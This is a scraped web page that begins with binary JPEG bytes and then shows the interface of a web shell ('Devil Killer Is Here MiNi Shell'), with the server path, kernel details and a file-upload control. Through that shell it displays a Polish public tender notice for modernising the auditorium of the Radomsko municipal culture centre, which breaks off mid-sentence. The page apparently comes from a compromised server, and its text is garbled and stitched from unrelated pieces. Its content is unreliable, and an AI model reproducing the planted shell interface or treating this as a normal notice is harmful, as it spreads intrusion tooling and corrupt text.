JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220502/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220502/0014252901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja Sali widowiskowej MDK w Radomsku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Dom Kultury</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000787750</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Brzeźnicka 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radomsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">administracja@mdkradomsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mdkradomsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja Sali widowiskowej MDK w Radomsku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-22788c68-c9e2-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00142529</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-05-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00061149/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja Sali widowiskowej MDK w Radomsku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt pn. „Miejski Dom Kultury w Radomsku – projekt nowej przestrzeni dla kultury – Etap II” realizowany jest ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach RPOWŁ 2014-2020. Oś priorytetowa VI. Rewitalizacja i potencjał endogeniczny regionu; Działanie VI.1. Dziedzictwo kulturowe i infrastruktura kultury; Poddziałanie VI.1.2. Dziedzictwo kulturowe i infrastruktura kultury </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mdkradomsko.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a wykonawcami odbywa się przy użyciu miniPortalu,<br/>który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej.<br/>Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami:<br/>Pan Krzysztof Zygma; email: krzysztof.zygma@mdkradomsko.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z RODO tj.<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1).<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję,<br/>że:<br/>1) administratorem Pani/Pana danych osobowych jest Miejski Dom Kultury w Radomsku<br/>reprezentowana przez Dyrektora<br/>Dane tele-adresowe Zamawiającego:<br/>Miejski Dom Kultury w Radomsku<br/>97-500 Radomsko ul. Brzeźnicka 5<br/>2) w Miejskim Domu Kultury wyznaczony został Inspektor Ochrony Danych – Pan Jacek Majak,<br/>kontakt: iod@mdkradomsko.pl<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym pn.<br/>„Modernizacja Sali widowiskowej MDK w Radomsku”;<br/>Pozostałe informacje dot. RODO opisane zostały w Rozdziale I pkt. 22 Specyfikacji Warunków<br/>Zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">271.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1909503,44 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.Przedmiotem zamówienia jest realizacja zadania inwestycyjnego pn: „Modernizacja Sali<br/>widowiskowej MDK w Radomsku” w ramach projektu pn. „Miejski Dom Kultury w Radomsku –<br/>projekt nowej przestrzeni dla kultury – Etap II” realizowanego ze środków Europejskiego<br/>Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego<br/>Województwa Łódzkiego na lata 2014-2020. Oś priorytetowa VI. Rewitalizacja i potencjał<br/>endogeniczny regionu; Działanie VI.1. Dziedzictwo kulturowe i infrastruktura kultury;<br/>Poddziałanie VI.1.2. Dziedzictwo kulturowe i infrastruktura kultury.<br/>3.2. W zakres robót stanowiących przedmiot zamówienia, o którym mowa w pkt. 3.1 wchodzi w<br/>szczególności:<br/>1) Zabezpieczenie istniejącego sufitu sali kinowej,<br/>2) Skucie i zerwanie istniejących podłóg w sali kinowej oraz na balkonie,<br/>3) Wykonanie nowych podłóg na sali kinowej oraz balkonie,<br/>4) Pionowanie ścian na poziomie parteru do wysokości ok. 3,20 m poprzez wykonanie obudowy<br/>z płyt GK na profilach stalowych, a nastepnie wykonanie gładzi gipsowej, gruntowanie i<br/>dwukrotne malowanie farbami silikatowymi,<br/>5) Wymiana stolarki drzwiowej,<br/>6) Wymiana foteli w sali kinowej,<br/>7) Przebudowa instalacji elektrycznej (w szczególności oświetlenie wewnetrzne, instalacja<br/>gniazd wtykowych, rozdzielnica R1, instalacja zalicznikowa dla rozdzielnicy R1, instalacja pętli<br/>indukcyjnej oraz instalacji audiodekrypcji służących zwiększeniu dostępności obiektu dla osób<br/>niepełnosprawnych),<br/>8) Zakup, dostawa i montaż pozostałego wyposażenia.<br/>Wszystkie użyte do realizacji przedmiotu zamówienia materiały, urządzenia oraz elementy<br/>wyposażenia, w tym w szczególności fotele kinowe muszą być fabrycznie nowe. Zamawiający<br/>nie dopuszcza wykorzystania materiałów, urządzeń oraz elementów wyposażenia używanych, w<br/>tym pochodzących z odzysku.<br/>3.3. Szczegółowy opis zakresu robót, o których mowa w pkt. 3.1 określony został w:<br/>1) Projekcie technicznym branży architektonicznej oraz branży elektrycznej<br/>2) Specyfikacji technicznej wykonania i odbioru robót branży architektonicznej oraz branży<br/>elektrycznej<br/>3) Przedmiarach robót branży architektonicznej oraz branży elektrycznej.<br/>Uwaga:<br/>Z uwagi na przyjęty charakter wynagrodzenia Wykonawcy (ryczałt) przedmiary robot pełnią<br/>wyłącznie funkcję informacyjną.<br/>3.4. W przypadku gdy Zamawiający dokonał opisu przedmiotu zamówienia w dokumentacji<br/>będącej załącznikami do SWZ przez wskazanie przykładowych znaków towarowych lub<br/>pochodzenia, Wykonawcy zobowiązani są do oferowania materiałów określonych w<br/>dokumentacji lub o równoważnych parametrach. Wszystkie wskazane z nazwy materiały użyte w<br/>dokumentacji technicznej należy rozumieć jako określenie wymaganych parametrów<br/>technicznych lub standardów jakościowych. Materiały równoważne muszą być ofercie<br/>wymienione z nazwy, a ciężar udowodnienia zachowania parametrów wymaganych przez<br/>Zamawiającego leży po stronie składającego ofertę. Przez ofertę równoważną należy rozumieć<br/>ofertę o parametrach technicznych wytrzymałościowych, jakościowych, wydajnościowych nie<br/>gorszych od opisu wskazanego przez Zamawiającego w opisie przedmiotu zamówienia.<br/>Parametry wskazane przez Zamawiającego są parametrami minimalnymi, granicznymi. Pod<br/>pojęciem „parametry” rozumie się funkcjonalność, przeznaczenie, kolorystykę, strukturę,<br/>materiały, kształt, wielkość, bezpieczeństwo, wytrzymałość itp. W związku z powyższym<br/>Zamawiający dopuszcza możliwość zaoferowania materiałów o innych znakach towarowych,<br/>patentach lub pochodzeniu, natomiast nie o innych właściwościach i funkcjonalnościach niż<br/>określone w SWZ. Wykonawca powołujący się na rozwiązania równoważne stosownie do<br/>dyspozycji ustawy Pzp musi wykazać, że oferowane roboty budowlane spełniają warunki<br/>określone przez Zamawiającego w stopniu nie gorszym niż wskazany w SWZ. W przypadku, gdy Wykonawca nie złoży w ofercie dokumentów wskazujących na zastosowanie innych<br/>materiałów i urządzeń, to rozumie się przez to, że do kalkulacji ceny oferty oraz do wykonania<br/>umowy ujęto materiały i urządzenia zaproponowane w opisie przedmiotu zamówienia. W<br/>przypadku, gdy Zamawiający użył w opisie przedmiotu zamówienia normy, aprobaty,<br/>specyfikacje techniczne i systemy odniesienia, o których mowa w art. 101 ustawy Pzp należy je<br/>rozumieć jako przykładowe. Zamawiający zgodnie z art. 101 ustawy Pzp dopuszcza w każdym<br/>przypadku zastosowanie rozwiązań równoważnych opisywanym w treści SWZ. Każdorazowo<br/>gdy wskazana jest w niniejszej SWZ lub załącznikach do SWZ norma, należy przyjąć, że w<br/>odniesieniu do niej użyto sformułowania „lub równoważna”.<br/>W przypadku gdy wymagania w opisie przedmiotu zamówienia odnoszą się do europejskich<br/>ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których<br/>mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp, zamawiający wymaga, aby wykonawca przedstawił już<br/>w jego ofercie dowody równoważności w sposób określony w art. 101 ust. 5 i 6 Pzp.<br/>Zamawiający wskazuje, że obowiązek zgłoszenia w ofercie rozwiązań równoważnych w<br/>stosunku do opisanych w opisie przedmiotu zamówienia i wykazania równoważności leży po<br/>stronie wykonawcy.<br/>3.5. Prace uzupełniające wymagane przez Zamawiającego:<br/>Wykonanie dokumentacji odbiorowej w dwóch egzemplarzach w języku polskim z podziałem na<br/>branże (oprawionej w segregatory z szczegółowym spisem treści) zawierającej co najmniej:<br/>a) oryginał/kserokopię wewnętrznego dziennika budowy,<br/>b) oryginał pisemnego oświadczenia Kierownika Budowy o wykonaniu robót zgodnie z<br/>projektami technicznymi,<br/>c) zestawienie wbudowanych materiałów wraz z dokumentami potwierdzającymi dopuszczenie<br/>ich do stosowania na terenie Rzeczpospolitej Polskiej,<br/>d) oryginał/kopię projektu technicznego powykonawczego - podpisanego przez Kierownika<br/>Budowy/Kierowników Robót,<br/>e) wykaz zmian istotnych (jeżeli miały miejsce) z załącznikiem graficznym, podpisany przez<br/>Kierownika Budowy, Kierownika Robót odpowiedniego do charakterystyki branży, której dotyczy<br/>zmiana, Inspektora Nadzoru, Projektanta, wraz z dokumentami potwierdzającymi prawidłową<br/>legalizację tych zmian,<br/>f) protokoły z badań wykonanych w trakcie realizacji prac budowlanych,<br/>g) wersję elektroniczną (w ilości zgodnej z wersją papierową) dokumentów odbiorowych oraz<br/>dokumentacji powykonawczej (w formacie pdf.) na płycie CD/DVD,<br/>h) wykaz wbudowanych urządzeń, które wymagają przeglądów serwisowych,<br/>i) wszelkie instrukcje obsługi oraz DTR urządzeń (w języku polskim), wraz z potwierdzeniem<br/>wykonania szkoleń w zakresie obsługi tych urządzeń. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39111200-5 - Siedziska teatralne</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował<br/>następującymi kryteriami:<br/>1) cena oferty (C) – 90%<br/>2) długość okresu gwarancji – 10%<br/>Sposób oceny ofert:<br/>W kryterium „cena oferty” w którym zamawiającemu zależy, aby wykonawca przedstawił jak najniższą<br/>wartość (cena), zostanie zastosowany następujący wzór:<br/>Liczba Cn<br/>zdobytych (C) = ----------- x 100 x waga kryterium 90%<br/>punktów Cb<br/>Gdzie:<br/>Cn – cena najniższa wśród ofert nie odrzuconych<br/>Cb – cena oferty badanej<br/>100 – wskaźnik stały<br/>90 – procentowe znaczenie kryterium ceny<br/>Liczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie<br/>ceny najniższej z ofert przez cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100<br/>punktów i wagę kryterium, którą ustalono na 90%.<br/>W kryterium „długość okresu gwarancji” w którym Zamawiającemu zależy, aby Wykonawca przedstawił<br/>jak najwyższy wskaźnik (długość okresu gwarancji), przyznana zostanie następująca punktacja:<br/>1) oferowana długość okresu gwarancji 5 lat – 0 x waga kryterium (10%) = 0,00 pkt.,<br/>2) oferowana długość okresu gwarancji 6 lat – 50 x waga kryterium (10%) = 5,00 pkt.,<br/>3) oferowana długość okresu gwarancji 7 lat i więcej – 100 x waga kryterium (10%) = 10,00 pkt.<br/>Uwaga:<br/>Zamawiający zastrzega, iż minimalna długość okresu gwarancji wynosi 5 lat. Oferta złożona przez<br/>wykonawcę, który zaoferuje długość okresu gwarancji krótszą niż 5 lat podlegać będzie odrzuceniu.<br/>Wydłużenie okresu gwarancji ponad 5 lat, jest równoznaczne z jednoczesnym wydłużeniem okresu<br/>rękojmi. Okres gwarancji i rękojmi jest liczony od daty odbioru końcowego.<br/>Wykonawca zobowiązany jest podać w ofercie długość okresu gwarancji wyrażoną w pełnych latach.<br/>Szczegółowe wymagania gwarancji określone zostały w załączniku do wzoru umowy.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów (P)<br/>wyliczoną zgodnie z poniższym wzorem:<br/>P = C + G<br/>Gdzie:<br/>P – łączna liczba punktów oferty ocenianej<br/>C – liczba punktów uzyskanych w kryterium „cena oferty”<br/>G - liczba punktów uzyskanych w kryterium „długość okresu gwarancji”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający stawia szczegółowe wymagania w zakresie oceny tych zdolności tj. o udzielenie<br/>zamówienia może ubiegać się wykonawca, który wykaże minimalne poziomy zdolności w<br/>zakresie sytuacji ekonomicznej lub finansowej tj. który wykaże, iż posiada środki finansowe lub<br/>zdolność kredytową w kwocie nie mniejszej niż 500.000,00 zł (słownie: pięćset tysięcy złotych<br/>00/100).<br/>Wykonawca potwierdza spełnianie warunku w pierwszej kolejności poprzez złożenie wraz z<br/>ofertą Oświadczenia własnego, o którym mowa w pkt. 7.1 SWZ.<br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający stawia szczegółowe wymagania w zakresie oceny tych zdolności tj. o udzielenie<br/>zamówienia może ubiegać się wykonawca, który wykaże minimalne poziomy zdolności w<br/>zakresie posiadanego doświadczenia oraz w zakresie osób, które zostaną skierowane przez<br/>wykonawcę do realizacji zamówienia tj. który wykaże, iż:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy w tym okresie wykonał co najmniej 1 inwestycję polegającą na<br/>przebudowie lub remoncie (obejmującej wykonanie robót wykończeniowych) budynku o<br/>kubaturze powyżej 4 tys m3,<br/>b) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy w tym okresie wykonał co najmniej 1 dostawę wraz z montażem foteli<br/>kinowych lub teatralnych,<br/>c) dysponuje osobą, która pełnić będzie funkcję kierownika budowy posiadającą uprawnienia do<br/>kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń<br/>określone przepisami ustawy Prawo budowlane,<br/>d) dysponuje osobą która pełnić będzie funkcję kierownika robót branży instalacyjnej<br/>elektrycznej posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez<br/>ograniczeń określone przepisami ustawy Prawo budowlane.<br/>Wykonawca potwierdza spełnianie warunku w pierwszej kolejności poprzez złożenie wraz z<br/>ofertą Oświadczenia własnego, o którym mowa w pkt. 7.1. SWZ.<br/>6.2. W odniesieniu do warunków dotyczących wykształcenia, 